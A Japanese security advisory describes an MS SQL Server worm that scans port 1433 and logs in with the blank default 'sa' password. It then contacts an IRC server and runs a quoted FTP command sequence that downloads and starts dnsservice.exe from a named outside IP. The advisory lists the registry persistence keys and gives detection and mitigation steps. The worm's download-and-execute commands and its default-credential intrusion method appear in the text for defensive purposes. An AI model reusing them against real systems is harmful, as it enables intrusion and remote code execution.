マイクロソフトSQLサーバーを狙ったワームが蔓延中 | ScanNetSecurity[国内最大級のサイバーセキュリティ専門ポータルサイト]
2017.10.20(金)

マイクロソフトSQLサーバーを狙ったワームが蔓延中

国際 海外情報

概要:
 TCPポート1433を走査しているワームが蔓延中との報告がある。1433ポートはマイクロソフト社のSQL サーバーのポートとして使用される事が多い。1433ポートが開いている事をワームが確認すると、ワームはホストへの侵入をユーザー名sa、 パスワードはブランク(無し)で試みる。アプリケーションの多くがSQLサポートを使用している為、システム管理者が使用するIDとしてデフォルトが"sa"になっておりパスワードは設定されていない。

 ログオンに成功すると、ポート6669にあるbots.kujikiri.netのIRCサーバーに接続する。ワームがホストに到達すると、IRCチャンネルに"ホストが感染した"というメッセージを残す。次にIPアドレス207.29.192.160(フィラデルフィア美術館に関係したアドレス)にFTP接続し以下のコマンドを実行する。

ftp
foo.com
bin
cd pub
cd tmp
get dnsservice.exe
start dnsservice.exe
close
quit

 上記の"ftp"はFTPアクセスに使用されたユーザ−名で" foo.com "は パスワードとして使用されている。感染したホストにdnsservice.exeをダウンロードし実行する仕掛けになっている。現段階ではこの実行ファイルによる影響は分っていない。

 更にコンピュータが起動する度にプログラムが走るようにレジストリに以下の3つのキーが書き加えられる。

SOFTWAREMicrosoftWindowsCurrentVersionRunTaskReg
SOFTWAREMicrosoftMSSQLServerClientSuperSocketNetLibProtocolOrder
SOFTWAREMicrosoftMSSQLServerClientConnectToDSQUERY


情報ソース:
Neohapis Archives (MS SQL HACKING, ), Nov. 13, 2000
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0094.html
incidents@securityfocus.com (Douglas P. Brown (dugbrown@email.unc.edu)), Nov. 20, 2001
BugTraq (Patrick Andry, pandry@wolverinefreight.ca), Nov. 20, 2001
BugTraq (Arthur Donkers, arthur@reseau.nl), Nov. 20, 2001
Incidents.org Oct. 04, 2001
http://www.incidents.org/diary/october01/100401.php#043
iDEFENSE Intelligence Operations, Nov. 20, 2001
iDEFENSE Labs, Nov. 20, 2001


分析:
 目的は不明だが、ワームは開いている1433TCPポートを走査している。このポートは通常、SQLサーバーを使用するProject 2000, Viso2000, Access 2000 及び Visual Studio 6.0が使用されている時に稼動する。

 SANS研究所によれば、最近、ポート1433の走査が盛んに行われたのは今年の10月上旬頃からとの報告がある。多くのスキャンは韓国発である事も確認されている。

 現時点ではアドレス207.29.192.160のFTPサーバー及び関連している実行ファイルの情報は入手出来ていないが、ワームの当バージョンは繁殖していない可能性もある。但し、将来、Ramenワームの様に新に感染したホストに自らのコピーをアップロード出来る亜種が発生する可能性もある。この様な亜種が発生すれば繁殖を抑える事は難しくなる。


検知方法:
 上記のレジストリがあれば感染している可能性がある。さらに Windows NT.4.0/2000では、システム管理者がMSSQLサーバーサービスが稼動していればコントロールパネルのサービスで確認する事ができる。IDS(侵入検知)で上記のテキスト文をftpセッション若しくはIRCとFTPに出て行くコネクションをモニターする事でワームを検知する事ができる。


暫定処置:
 コマンドプロンプトでnetstat -aのコマンドをかけて現在のポートの使用状況が確認できる。もし、TCP 1433ポートがあればSQLの機能と関連しているデフォルトのユーザ名、パスワードを変更する。また、TCP 1433ポートがインターネット接続に必要なポートでなければ、ルーター又はファイヤーウォールに当該ポートのingress/egressフィルタリング制限をかけると更に良い。


(詳しくはScan Daily EXpress本誌をご覧下さい)
http://vagabond.co.jp/vv/m-sdex.htm

※この情報はiDEFENSE社( http://www.idefense.co.jp/ )より提供いただいております。情報の内容は以下の時点におけるものです
【23:50 GMT、11、20、2001】

《ScanNetSecurity》

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

Scan BASIC 会員限定記事

もっと見る

Scan BASIC 会員限定記事特集をもっと見る

[Web小説] サイバー探偵 工藤伸治の事件簿サーガ (シーズン 1~6 第1話)

もっと見る

[Web小説] サイバー探偵 工藤伸治の事件簿サーガ (シーズン 1~6 第1話)特集をもっと見る

カテゴリ別新着記事

国際 カテゴリの人気記事 MONTHLY ランキング

  1. 搾取される底辺サイバー犯罪者、無料配付トロイにはバックドア(The Register)

    搾取される底辺サイバー犯罪者、無料配付トロイにはバックドア(The Register)

  2. セキュリティ人材の慢性不足、海外の取り組みは(The Register)

    セキュリティ人材の慢性不足、海外の取り組みは(The Register)

  3. SMSによる二要素認証が招くSOS(The Register)

    SMSによる二要素認証が招くSOS(The Register)

  4. フィッシング詐欺支援サービスの価格表(The Register)

  5. WPA2の新たな脆弱性への攻撃KRACK、暗号化技術の根底にある欠陥(The Register)

  6. 「Tor 禁止令」を解く Facebook、暗号化の onion アクセスポイントを宣伝~これからは暗号化通信も完全に OK(The Register)

  7. iCloudからの女優のプライベート画像流出事件、容疑者がフィッシングの罪を大筋で認める

  8. Mac OS X のシングルユーザモードの root アクセス(2)

  9. AWS 設定ミスでウォールストリートジャーナル購読者情報他 220 万件流出(The Register)

  10. Cisco のセキュリティビジネスに市場が多大な関心を寄せる理由(The Register)

全カテゴリランキング

★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★
<b>★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★</b>

経営課題としてサイバーセキュリティに取り組む情報システム部門や、研究・開発・経営企画に携わる方へ向けた、創刊19年のセキュリティ情報サービス Scan PREMIUM を、貴社の事業リスク低減のためにご活用ください。

×